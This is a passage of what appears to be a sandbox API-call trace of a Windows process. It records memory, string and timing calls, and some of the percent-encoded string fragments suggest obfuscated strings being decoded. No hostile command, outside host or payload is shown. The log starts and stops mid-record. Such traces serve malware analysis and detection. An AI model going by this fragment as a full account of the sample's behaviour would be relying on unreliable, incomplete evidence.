0x210d2c8 [0100.726] GetTickCount () returned 0x210d2c8 [0100.729] GetTickCount () returned 0x210d2c8 [0100.731] GetTickCount () returned 0x210d2c8 [0100.734] GetTickCount () returned 0x210d2c8 [0100.736] GetTickCount () returned 0x210d2c8 [0100.745] GetTickCount () returned 0x210d2d8 [0100.747] malloc (_Size=0x28) returned 0x24ae13af260 [0100.747] malloc (_Size=0x28) returned 0x24ae13af170 [0100.747] GetTickCount () returned 0x210d2d8 [0100.747] malloc (_Size=0x28) returned 0x24ae13af290 [0100.748] memcpy (in: _Dst=0x24adf9bb82e, _Src=0x24adf9bc2f8, _Size=0x2 | out: _Dst=0x24adf9bb82e) returned 0x24adf9bb82e [0100.748] memcpy (in: _Dst=0x24adf9bb82c, _Src=0x24adf9bc378, _Size=0x2 | out: _Dst=0x24adf9bb82c) returned 0x24adf9bb82c [0100.748] memcpy (in: _Dst=0x24adf9bb82a, _Src=0x24adf9bc0b8, _Size=0x2 | out: _Dst=0x24adf9bb82a) returned 0x24adf9bb82a [0100.748] memcpy (in: _Dst=0x24adf9bb828, _Src=0x24adf9bc0f8, _Size=0x2 | out: _Dst=0x24adf9bb828) returned 0x24adf9bb828 [0100.748] free (_Block=0x24ae13af290) [0100.748] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8b", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.748] memcpy (in: _Dst=0x24adf9bbdd8, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9bbdd8) returned 0x24adf9bbdd8 [0100.749] malloc (_Size=0x28) returned 0x24ae13af290 [0100.749] memcpy (in: _Dst=0x24adf9bb85e, _Src=0x24ae1a0f69c, _Size=0xc | out: _Dst=0x24adf9bb85e) returned 0x24adf9bb85e [0100.749] memcpy (in: _Dst=0x24adf9bb858, _Src=0x24adf9bbdd8, _Size=0x6 | out: _Dst=0x24adf9bb858) returned 0x24adf9bb858 [0100.749] free (_Block=0x24ae13af290) [0100.750] malloc (_Size=0x28) returned 0x24ae13af2f0 [0100.750] malloc (_Size=0x28) returned 0x24ae13af290 [0100.750] malloc (_Size=0x28) returned 0x24ae148aef0 [0100.751] malloc (_Size=0x28) returned 0x24ae148b2b0 [0100.751] malloc (_Size=0x28) returned 0x24ae148b130 [0100.751] malloc (_Size=0x28) returned 0x24ae148b0a0 [0100.751] memcpy (in: _Dst=0x24adf9bbbf4, _Src=0x24adf9bc258, _Size=0x2 | out: _Dst=0x24adf9bbbf4) returned 0x24adf9bbbf4 [0100.751] memcpy (in: _Dst=0x24adf9bbbf2, _Src=0x24adf9bc098, _Size=0x2 | out: _Dst=0x24adf9bbbf2) returned 0x24adf9bbbf2 [0100.751] memcpy (in: _Dst=0x24adf9bbbf0, _Src=0x24adf9bbf78, _Size=0x2 | out: _Dst=0x24adf9bbbf0) returned 0x24adf9bbbf0 [0100.752] memcpy (in: _Dst=0x24adf9bbbee, _Src=0x24adf9bbe98, _Size=0x2 | out: _Dst=0x24adf9bbbee) returned 0x24adf9bbbee [0100.752] memcpy (in: _Dst=0x24adf9bbbec, _Src=0x24adf9bbcd8, _Size=0x2 | out: _Dst=0x24adf9bbbec) returned 0x24adf9bbbec [0100.752] memcpy (in: _Dst=0x24adf9bbbea, _Src=0x24adf9bc078, _Size=0x2 | out: _Dst=0x24adf9bbbea) returned 0x24adf9bbbea [0100.752] memcpy (in: _Dst=0x24adf9bbbe8, _Src=0x24adf9bbe58, _Size=0x2 | out: _Dst=0x24adf9bbbe8) returned 0x24adf9bbbe8 [0100.752] free (_Block=0x24ae148b0a0) [0100.752] memcpy (in: _Dst=0x24adf9bc338, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc338) returned 0x24adf9bc338 [0100.752] malloc (_Size=0x28) returned 0x24ae148ae00 [0100.752] memcpy (in: _Dst=0x24adf9b9eac, _Src=0x24adf9bc338, _Size=0x4 | out: _Dst=0x24adf9b9eac) returned 0x24adf9b9eac [0100.752] memcpy (in: _Dst=0x24adf9b9ea8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9ea8) returned 0x24adf9b9ea8 [0100.753] free (_Block=0x24ae148ae00) [0100.753] memcpy (in: _Dst=0x24adf9bc118, _Src=0x24adf9b9eac, _Size=0x4 | out: _Dst=0x24adf9bc118) returned 0x24adf9bc118 [0100.754] malloc (_Size=0x28) returned 0x24ae148af80 [0100.754] GetTickCount () returned 0x210d2e8 [0100.754] memcpy (in: _Dst=0x24adf9bbe38, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbe38) returned 0x24adf9bbe38 [0100.754] malloc (_Size=0x28) returned 0x24ae148ace0 [0100.754] memcpy (in: _Dst=0x24adf9ba38c, _Src=0x24adf9bbe38, _Size=0x4 | out: _Dst=0x24adf9ba38c) returned 0x24adf9ba38c [0100.754] memcpy (in: _Dst=0x24adf9ba388, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba388) returned 0x24adf9ba388 [0100.755] free (_Block=0x24ae148ace0) [0100.755] memcpy (in: _Dst=0x24adf9bc3b8, _Src=0x24adf9ba38c, _Size=0x4 | out: _Dst=0x24adf9bc3b8) returned 0x24adf9bc3b8 [0100.755] malloc (_Size=0x28) returned 0x24ae148b160 [0100.755] malloc (_Size=0x28) returned 0x24ae148ab90 [0100.755] memcpy (in: _Dst=0x24adf9bc178, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc178) returned 0x24adf9bc178 [0100.755] malloc (_Size=0x28) returned 0x24ae148b1c0 [0100.755] memcpy (in: _Dst=0x24adf9b9c3c, _Src=0x24adf9bc178, _Size=0x4 | out: _Dst=0x24adf9b9c3c) returned 0x24adf9b9c3c [0100.755] memcpy (in: _Dst=0x24adf9b9c38, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9c38) returned 0x24adf9b9c38 [0100.756] free (_Block=0x24ae148b1c0) [0100.756] memcpy (in: _Dst=0x24adf9bbeb8, _Src=0x24adf9b9c3c, _Size=0x4 | out: _Dst=0x24adf9bbeb8) returned 0x24adf9bbeb8 [0100.756] malloc (_Size=0x28) returned 0x24ae148af20 [0100.756] malloc (_Size=0x28) returned 0x24ae148b100 [0100.756] memcpy (in: _Dst=0x24adf9bbd18, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbd18) returned 0x24adf9bbd18 [0100.756] malloc (_Size=0x28) returned 0x24ae148b250 [0100.756] memcpy (in: _Dst=0x24adf9ba0bc, _Src=0x24adf9bbd18, _Size=0x4 | out: _Dst=0x24adf9ba0bc) returned 0x24adf9ba0bc [0100.756] memcpy (in: _Dst=0x24adf9ba0b8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba0b8) returned 0x24adf9ba0b8 [0100.757] free (_Block=0x24ae148b250) [0100.757] memcpy (in: _Dst=0x24adf9bbed8, _Src=0x24adf9ba0bc, _Size=0x4 | out: _Dst=0x24adf9bbed8) returned 0x24adf9bbed8 [0100.757] malloc (_Size=0x28) returned 0x24ae148ad70 [0100.757] malloc (_Size=0x28) returned 0x24ae148afb0 [0100.757] memcpy (in: _Dst=0x24adf9bbfd8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbfd8) returned 0x24adf9bbfd8 [0100.757] malloc (_Size=0x28) returned 0x24ae148acb0 [0100.757] memcpy (in: _Dst=0x24adf9b9e1c, _Src=0x24adf9bbfd8, _Size=0x4 | out: _Dst=0x24adf9b9e1c) returned 0x24adf9b9e1c [0100.757] memcpy (in: _Dst=0x24adf9b9e18, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9e18) returned 0x24adf9b9e18 [0100.758] free (_Block=0x24ae148acb0) [0100.758] memcpy (in: _Dst=0x24adf9bc158, _Src=0x24adf9b9e1c, _Size=0x4 | out: _Dst=0x24adf9bc158) returned 0x24adf9bc158 [0100.758] memcpy (in: _Dst=0x24adf9bc018, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc018) returned 0x24adf9bc018 [0100.758] memcpy (in: _Dst=0x24adf9ba05c, _Src=0x24adf9bc018, _Size=0x4 | out: _Dst=0x24adf9ba05c) returned 0x24adf9ba05c [0100.758] memcpy (in: _Dst=0x24adf9ba058, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba058) returned 0x24adf9ba058 [0100.758] free (_Block=0x24ae148af50) [0100.758] memcpy (in: _Dst=0x24adf9bc138, _Src=0x24adf9ba05c, _Size=0x4 | out: _Dst=0x24adf9bc138) returned 0x24adf9bc138 [0100.758] memcpy (in: _Dst=0x24adf9bc198, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bc198) returned 0x24adf9bc198 [0100.758] memcpy (in: _Dst=0x24adf9b9ccc, _Src=0x24adf9bc198, _Size=0x4 | out: _Dst=0x24adf9b9ccc) returned 0x24adf9b9ccc [0100.758] memcpy (in: _Dst=0x24adf9b9cc8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9cc8) returned 0x24adf9b9cc8 [0100.758] free (_Block=0x24ae148ace0) [0100.758] memcpy (in: _Dst=0x24adf9bbd98, _Src=0x24adf9b9ccc, _Size=0x4 | out: _Dst=0x24adf9bbd98) returned 0x24adf9bbd98 [0100.758] memcpy (in: _Dst=0x24adf9acf4e, _Src=0x24adf9bbd98, _Size=0x4 | out: _Dst=0x24adf9acf4e) returned 0x24adf9acf4e [0100.759] memcpy (in: _Dst=0x24adf9acf4c, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acf4c) returned 0x24adf9acf4c [0100.759] memcpy (in: _Dst=0x24adf9acf48, _Src=0x24adf9bc138, _Size=0x4 | out: _Dst=0x24adf9acf48) returned 0x24adf9acf48 [0100.759] memcpy (in: _Dst=0x24adf9acf46, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acf46) returned 0x24adf9acf46 [0100.759] memcpy (in: _Dst=0x24adf9acf42, _Src=0x24adf9bc158, _Size=0x4 | out: _Dst=0x24adf9acf42) returned 0x24adf9acf42 [0100.759] memcpy (in: _Dst=0x24adf9acf40, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acf40) returned 0x24adf9acf40 [0100.759] memcpy (in: _Dst=0x24adf9acf3c, _Src=0x24adf9bbed8, _Size=0x4 | out: _Dst=0x24adf9acf3c) returned 0x24adf9acf3c [0100.759] memcpy (in: _Dst=0x24adf9acf3a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acf3a) returned 0x24adf9acf3a [0100.759] memcpy (in: _Dst=0x24adf9acf36, _Src=0x24adf9bbeb8, _Size=0x4 | out: _Dst=0x24adf9acf36) returned 0x24adf9acf36 [0100.759] memcpy (in: _Dst=0x24adf9acf34, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acf34) returned 0x24adf9acf34 [0100.759] memcpy (in: _Dst=0x24adf9acf30, _Src=0x24adf9bc3b8, _Size=0x4 | out: _Dst=0x24adf9acf30) returned 0x24adf9acf30 [0100.759] memcpy (in: _Dst=0x24adf9acf2e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acf2e) returned 0x24adf9acf2e [0100.759] memcpy (in: _Dst=0x24adf9acf2a, _Src=0x24adf9bc118, _Size=0x4 | out: _Dst=0x24adf9acf2a) returned 0x24adf9acf2a [0100.759] memcpy (in: _Dst=0x24adf9acf28, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9acf28) returned 0x24adf9acf28 [0100.759] free (_Block=0x24ae148af50) [0100.759] SysStringLen (param_1="%c3%87%c2%86%11%c2%83") returned 0x15 [0100.759] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.760] memcpy (in: _Dst=0x24adf9ba0e8, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9ba0e8) returned 0x24adf9ba0e8 [0100.760] free (_Block=0x24ae1480630) [0100.760] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ç", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.761] memcpy (in: _Dst=0x24adf9bbc78, _Src=0xd6788fbb30, _Size=0x2 | out: _Dst=0x24adf9bbc78) returned 0x24adf9bbc78 [0100.761] memcpy (in: _Dst=0x24adf9ba2fa, _Src=0x24ae1a0f6b4, _Size=0xc | out: _Dst=0x24adf9ba2fa) returned 0x24adf9ba2fa [0100.761] memcpy (in: _Dst=0x24adf9ba2f8, _Src=0x24adf9bbc78, _Size=0x2 | out: _Dst=0x24adf9ba2f8) returned 0x24adf9ba2f8 [0100.761] free (_Block=0x24ae148add0) [0100.762] memcpy (in: _Dst=0x24adf9b9c6e, _Src=0x24adf9bc2b8, _Size=0x2 | out: _Dst=0x24adf9b9c6e) returned 0x24adf9b9c6e [0100.762] memcpy (in: _Dst=0x24adf9b9c6c, _Src=0x24adf9bc298, _Size=0x2 | out: _Dst=0x24adf9b9c6c) returned 0x24adf9b9c6c [0100.762] memcpy (in: _Dst=0x24adf9b9c6a, _Src=0x24adf9bc1f8, _Size=0x2 | out: _Dst=0x24adf9b9c6a) returned 0x24adf9b9c6a [0100.762] memcpy (in: _Dst=0x24adf9b9c68, _Src=0x24adf9bc1b8, _Size=0x2 | out: _Dst=0x24adf9b9c68) returned 0x24adf9b9c68 [0100.762] free (_Block=0x24ae148abf0) [0100.762] memcpy (in: _Dst=0x24adf9bbd58, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbd58) returned 0x24adf9bbd58 [0100.762] memcpy (in: _Dst=0x24adf9b9c9c, _Src=0x24adf9bbd58, _Size=0x4 | out: _Dst=0x24adf9b9c9c) returned 0x24adf9b9c9c [0100.762] memcpy (in: _Dst=0x24adf9b9c98, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9c98) returned 0x24adf9b9c98 [0100.762] free (_Block=0x24ae148af50) [0100.762] memcpy (in: _Dst=0x24adf9bbc98, _Src=0x24adf9b9c9c, _Size=0x4 | out: _Dst=0x24adf9bbc98) returned 0x24adf9bbc98 [0100.762] memcpy (in: _Dst=0x24adf9bbdb8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9bbdb8) returned 0x24adf9bbdb8 [0100.762] memcpy (in: _Dst=0x24adf9ba02c, _Src=0x24adf9bbdb8, _Size=0x4 | out: _Dst=0x24adf9ba02c) returned 0x24adf9ba02c [0100.763] memcpy (in: _Dst=0x24adf9ba028, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba028) returned 0x24adf9ba028 [0100.763] free (_Block=0x24ae148b190) [0100.763] memcpy (in: _Dst=0x24adf9b8cd8, _Src=0x24adf9ba02c, _Size=0x4 | out: _Dst=0x24adf9b8cd8) returned 0x24adf9b8cd8 [0100.763] memcpy (in: _Dst=0x24adf9b8ff8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8ff8) returned 0x24adf9b8ff8 [0100.763] memcpy (in: _Dst=0x24adf9ba08c, _Src=0x24adf9b8ff8, _Size=0x4 | out: _Dst=0x24adf9ba08c) returned 0x24adf9ba08c [0100.763] memcpy (in: _Dst=0x24adf9ba088, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba088) returned 0x24adf9ba088 [0100.763] free (_Block=0x24ae148b190) [0100.763] memcpy (in: _Dst=0x24adf9b8e98, _Src=0x24adf9ba08c, _Size=0x4 | out: _Dst=0x24adf9b8e98) returned 0x24adf9b8e98 [0100.763] memcpy (in: _Dst=0x24adf9b8dd8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8dd8) returned 0x24adf9b8dd8 [0100.763] memcpy (in: _Dst=0x24adf9ba1ac, _Src=0x24adf9b8dd8, _Size=0x4 | out: _Dst=0x24adf9ba1ac) returned 0x24adf9ba1ac [0100.763] memcpy (in: _Dst=0x24adf9ba1a8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba1a8) returned 0x24adf9ba1a8 [0100.763] free (_Block=0x24ae148b1c0) [0100.763] memcpy (in: _Dst=0x24adf9b9398, _Src=0x24adf9ba1ac, _Size=0x4 | out: _Dst=0x24adf9b9398) returned 0x24adf9b9398 [0100.764] memcpy (in: _Dst=0x24adf9a5ebc, _Src=0x24adf9b9398, _Size=0x4 | out: _Dst=0x24adf9a5ebc) returned 0x24adf9a5ebc [0100.764] memcpy (in: _Dst=0x24adf9a5eba, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eba) returned 0x24adf9a5eba [0100.764] memcpy (in: _Dst=0x24adf9a5eb6, _Src=0x24adf9b8e98, _Size=0x4 | out: _Dst=0x24adf9a5eb6) returned 0x24adf9a5eb6 [0100.764] memcpy (in: _Dst=0x24adf9a5eb4, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eb4) returned 0x24adf9a5eb4 [0100.764] memcpy (in: _Dst=0x24adf9a5eb0, _Src=0x24adf9b8cd8, _Size=0x4 | out: _Dst=0x24adf9a5eb0) returned 0x24adf9a5eb0 [0100.764] memcpy (in: _Dst=0x24adf9a5eae, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5eae) returned 0x24adf9a5eae [0100.764] memcpy (in: _Dst=0x24adf9a5eaa, _Src=0x24adf9bbc98, _Size=0x4 | out: _Dst=0x24adf9a5eaa) returned 0x24adf9a5eaa [0100.764] memcpy (in: _Dst=0x24adf9a5ea8, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5ea8) returned 0x24adf9a5ea8 [0100.764] free (_Block=0x24ae148ada0) [0100.764] SysStringLen (param_1="%61%74%6f%62") returned 0xc [0100.764] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.764] memcpy (in: _Dst=0x24adf9b9f08, _Src=0x24ae1480630, _Size=0x8 | out: _Dst=0x24adf9b9f08) returned 0x24adf9b9f08 [0100.764] free (_Block=0x24ae1480630) [0100.765] memcpy (in: _Dst=0x24adf9b9258, _Src=0xd6788fbb30, _Size=0x6 | out: _Dst=0x24adf9b9258) returned 0x24adf9b9258 [0100.765] memcpy (in: _Dst=0x24adf9b9cfe, _Src=0x24ae1a0f6b4, _Size=0xc | out: _Dst=0x24adf9b9cfe) returned 0x24adf9b9cfe [0100.765] memcpy (in: _Dst=0x24adf9b9cf8, _Src=0x24adf9b9258, _Size=0x6 | out: _Dst=0x24adf9b9cf8) returned 0x24adf9b9cf8 [0100.765] free (_Block=0x24ae148b1c0) [0100.766] memcpy (in: _Dst=0x24adf9b9d32, _Src=0x24adf9b8c98, _Size=0x2 | out: _Dst=0x24adf9b9d32) returned 0x24adf9b9d32 [0100.766] memcpy (in: _Dst=0x24adf9b9d30, _Src=0x24adf9b8e18, _Size=0x2 | out: _Dst=0x24adf9b9d30) returned 0x24adf9b9d30 [0100.766] memcpy (in: _Dst=0x24adf9b9d2e, _Src=0x24adf9b8d58, _Size=0x2 | out: _Dst=0x24adf9b9d2e) returned 0x24adf9b9d2e [0100.766] memcpy (in: _Dst=0x24adf9b9d2c, _Src=0x24adf9b9018, _Size=0x2 | out: _Dst=0x24adf9b9d2c) returned 0x24adf9b9d2c [0100.766] memcpy (in: _Dst=0x24adf9b9d2a, _Src=0x24adf9b8c58, _Size=0x2 | out: _Dst=0x24adf9b9d2a) returned 0x24adf9b9d2a [0100.766] memcpy (in: _Dst=0x24adf9b9d28, _Src=0x24adf9b8d38, _Size=0x2 | out: _Dst=0x24adf9b9d28) returned 0x24adf9b9d28 [0100.766] free (_Block=0x24ae148b0d0) [0100.766] memcpy (in: _Dst=0x24adf9b8c78, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8c78) returned 0x24adf9b8c78 [0100.766] memcpy (in: _Dst=0x24adf9b9f3c, _Src=0x24adf9b8c78, _Size=0x4 | out: _Dst=0x24adf9b9f3c) returned 0x24adf9b9f3c [0100.766] memcpy (in: _Dst=0x24adf9b9f38, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9f38) returned 0x24adf9b9f38 [0100.766] free (_Block=0x24ae148b0d0) [0100.766] memcpy (in: _Dst=0x24adf9b8ef8, _Src=0x24adf9b9f3c, _Size=0x4 | out: _Dst=0x24adf9b8ef8) returned 0x24adf9b8ef8 [0100.767] memcpy (in: _Dst=0x24adf9b9238, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9238) returned 0x24adf9b9238 [0100.767] memcpy (in: _Dst=0x24adf9b9d8c, _Src=0x24adf9b9238, _Size=0x4 | out: _Dst=0x24adf9b9d8c) returned 0x24adf9b9d8c [0100.767] memcpy (in: _Dst=0x24adf9b9d88, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9d88) returned 0x24adf9b9d88 [0100.767] free (_Block=0x24ae148b220) [0100.767] memcpy (in: _Dst=0x24adf9b9118, _Src=0x24adf9b9d8c, _Size=0x4 | out: _Dst=0x24adf9b9118) returned 0x24adf9b9118 [0100.767] memcpy (in: _Dst=0x24adf9b8e58, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b8e58) returned 0x24adf9b8e58 [0100.767] memcpy (in: _Dst=0x24adf9b9edc, _Src=0x24adf9b8e58, _Size=0x4 | out: _Dst=0x24adf9b9edc) returned 0x24adf9b9edc [0100.767] memcpy (in: _Dst=0x24adf9b9ed8, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9ed8) returned 0x24adf9b9ed8 [0100.767] free (_Block=0x24ae148ad40) [0100.767] memcpy (in: _Dst=0x24adf9b8cb8, _Src=0x24adf9b9edc, _Size=0x4 | out: _Dst=0x24adf9b8cb8) returned 0x24adf9b8cb8 [0100.767] memcpy (in: _Dst=0x24adf9b9198, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b9198) returned 0x24adf9b9198 [0100.768] memcpy (in: _Dst=0x24adf9ba35c, _Src=0x24adf9b9198, _Size=0x4 | out: _Dst=0x24adf9ba35c) returned 0x24adf9ba35c [0100.768] memcpy (in: _Dst=0x24adf9ba358, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba358) returned 0x24adf9ba358 [0100.768] free (_Block=0x24ae148b280) [0100.768] memcpy (in: _Dst=0x24adf9b8f18, _Src=0x24adf9ba35c, _Size=0x4 | out: _Dst=0x24adf9b8f18) returned 0x24adf9b8f18 [0100.768] memcpy (in: _Dst=0x24adf9b90d8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b90d8) returned 0x24adf9b90d8 [0100.768] memcpy (in: _Dst=0x24adf9ba29c, _Src=0x24adf9b90d8, _Size=0x4 | out: _Dst=0x24adf9ba29c) returned 0x24adf9ba29c [0100.768] memcpy (in: _Dst=0x24adf9ba298, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9ba298) returned 0x24adf9ba298 [0100.768] free (_Block=0x24ae148ae90) [0100.768] memcpy (in: _Dst=0x24adf9b92d8, _Src=0x24adf9ba29c, _Size=0x4 | out: _Dst=0x24adf9b92d8) returned 0x24adf9b92d8 [0100.769] memcpy (in: _Dst=0x24adf9b91b8, _Src=0xd6788fa660, _Size=0x4 | out: _Dst=0x24adf9b91b8) returned 0x24adf9b91b8 [0100.769] memcpy (in: _Dst=0x24adf9b9d5c, _Src=0x24adf9b91b8, _Size=0x4 | out: _Dst=0x24adf9b9d5c) returned 0x24adf9b9d5c [0100.769] memcpy (in: _Dst=0x24adf9b9d58, _Src=0x24ae1a0570c, _Size=0x4 | out: _Dst=0x24adf9b9d58) returned 0x24adf9b9d58 [0100.769] free (_Block=0x24ae148ac50) [0100.769] memcpy (in: _Dst=0x24adf9b8e78, _Src=0x24adf9b9d5c, _Size=0x4 | out: _Dst=0x24adf9b8e78) returned 0x24adf9b8e78 [0100.769] memcpy (in: _Dst=0x24adf9a5948, _Src=0x24adf9b8e78, _Size=0x4 | out: _Dst=0x24adf9a5948) returned 0x24adf9a5948 [0100.769] memcpy (in: _Dst=0x24adf9a5946, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5946) returned 0x24adf9a5946 [0100.769] memcpy (in: _Dst=0x24adf9a5942, _Src=0x24adf9b92d8, _Size=0x4 | out: _Dst=0x24adf9a5942) returned 0x24adf9a5942 [0100.769] memcpy (in: _Dst=0x24adf9a5940, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5940) returned 0x24adf9a5940 [0100.769] memcpy (in: _Dst=0x24adf9a593c, _Src=0x24adf9b8f18, _Size=0x4 | out: _Dst=0x24adf9a593c) returned 0x24adf9a593c [0100.769] memcpy (in: _Dst=0x24adf9a593a, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a593a) returned 0x24adf9a593a [0100.769] memcpy (in: _Dst=0x24adf9a5936, _Src=0x24adf9b8cb8, _Size=0x4 | out: _Dst=0x24adf9a5936) returned 0x24adf9a5936 [0100.769] memcpy (in: _Dst=0x24adf9a5934, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5934) returned 0x24adf9a5934 [0100.769] memcpy (in: _Dst=0x24adf9a5930, _Src=0x24adf9b9118, _Size=0x4 | out: _Dst=0x24adf9a5930) returned 0x24adf9a5930 [0100.769] memcpy (in: _Dst=0x24adf9a592e, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a592e) returned 0x24adf9a592e [0100.769] memcpy (in: _Dst=0x24adf9a592a, _Src=0x24adf9b8ef8, _Size=0x4 | out: _Dst=0x24adf9a592a) returned 0x24adf9a592a [0100.770] memcpy (in: _Dst=0x24adf9a5928, _Src=0x24ae1a05700, _Size=0x2 | out: _Dst=0x24adf9a5928) returned 0x24adf9a5928 [0100.770] free (_Block=0x24ae148ae90) [0100.770] SysStringLen (param_1="%1e%63%c3%b1%c3%b5") returned 0x12 [0100.770] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.771] GetTickCount () returned 0x210d2f7 [0100.775] SysStringLen (param_1="%53%c2%b7%61%c2%85") returned 0x12 [0100.775] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.776] GetTickCount () returned 0x210d2f7 [0100.778] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x8a", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.778] GetTickCount () returned 0x210d2f7 [0100.781] SysStringLen (param_1="%74%61%74%65") returned 0xc [0100.781] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.782] GetTickCount () returned 0x210d2f7 [0100.782] GetTickCount () returned 0x210d2f7 [0100.783] GetTickCount () returned 0x210d2f7 [0100.786] SysStringLen (param_1="%06%44%c3%9f%c3%89") returned 0x12 [0100.786] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.787] GetTickCount () returned 0x210d307 [0100.788] GetTickCount () returned 0x210d307 [0100.789] SysStringLen (param_1="%69%7a%69%6e") returned 0xc [0100.789] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.789] GetTickCount () returned 0x210d307 [0100.790] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="\x9e", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.790] GetTickCount () returned 0x210d307 [0100.790] SysStringLen (param_1="%3a%01%0f%12") returned 0xc [0100.791] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.791] GetTickCount () returned 0x210d307 [0100.791] GetTickCount () returned 0x210d307 [0100.791] SysStringLen (param_1="%4e%26%2c%c2%b7") returned 0xf [0100.791] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.792] GetTickCount () returned 0x210d307 [0100.793] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="ñ", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.793] GetTickCount () returned 0x210d307 [0100.793] SysStringLen (param_1="%c2%a3%6c%0e%2c") returned 0xf [0100.793] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.793] GetTickCount () returned 0x210d307 [0100.795] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="Ð", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.796] GetTickCount () returned 0x210d307 [0100.796] SysStringLen (param_1="%c3%a5%6e%c2%90%c3%a0") returned 0x15 [0100.796] realloc (_Block=0x0, _Size=0xc8) returned 0x24ae1480630 [0100.796] GetTickCount () returned 0x210d307 [0100.796] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="å", cchSrc=1, lpCharType=0xd6788fd120 | out: lpCharType=0xd6788fd120) returned 1 [0100.796] GetTickCount () returned 0x210d307 [0100.797] CoGetObjectContext (in: riid=0x7ff859893838*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd6788fae80 | out: ppv=0xd6788fae80*=0x24adf97e528) returned 0x0 [0100.797] free (_Block=0x24ae13aec80) [0100.798] free (_Block=0x24ae13ae950) [0100.798] free (_Block=0x24ae13aebf0) [0100.798] free (_Block=0x24ae13aed40) [0100.798] free (_Block=0x24ae13aebc0) [0100.798] free (_Block=0x24ae13ae830) [0100.798] free 